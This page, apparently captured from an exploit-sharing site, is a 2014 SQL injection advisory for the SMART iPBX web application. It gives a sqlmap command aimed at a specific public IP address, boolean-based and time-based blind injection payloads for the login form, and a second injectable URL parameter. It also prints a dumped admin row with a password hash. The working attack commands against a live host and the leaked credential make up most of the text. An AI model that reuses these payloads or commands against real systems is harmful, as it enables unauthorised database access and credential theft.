facebook facebook twitter rss

SMART iPBX - Multiple Sql Injection

Author: AtT4CKxT3rR0r1ST , Published: 17-05-2014
SMART iPBX - Multiple Sql Injection
===================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://softmatica.com.do/softmatica/?p=216
####################################################################

Multiple Sql Injection
=======================
[1] Time-Based Blind Injection [POST]

sqlmap.py -u "http://190.6.141.106/login_validator.php" --data="user=AXT&pass=AXT&login=Entrar" -p "user" --level=5 --risk=5 -D asterisk -T user -C id,level,username,password --dump


Place: POST
Parameter: user
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: user=-AXT' OR (4281=4281)#&pass=AXT&login=Entrar

Type: AND/OR time-based blind
Title: MySQL < 5.0.12 AND time-based blind (heavy query - comment)
Payload: user=AXT' AND 5746=BENCHMARK(5000000,MD5(0x6f464d48))#&pass=AXT&login=Entrar
---
web server operating system: Linux CentOS 5.8
web application technology: Apache 2.2.3, PHP 5.1.6
back-end DBMS: MySQL 5
Database: asterisk
Table: user
[1 entry]
+----+---------+----------+------------------------------------------+
| id | level | username | password |
+----+---------+----------+------------------------------------------+
| 1 | 9 | admin | 21232f297a57a5a743894a0e4a801fc3 |
+----+---------+----------+------------------------------------------+



[2] Classic Sql injection

http://190.6.141.106/editarclave.php?accion=e&id=[SQL INJECTION]]&ld=1

Like us on Facebook :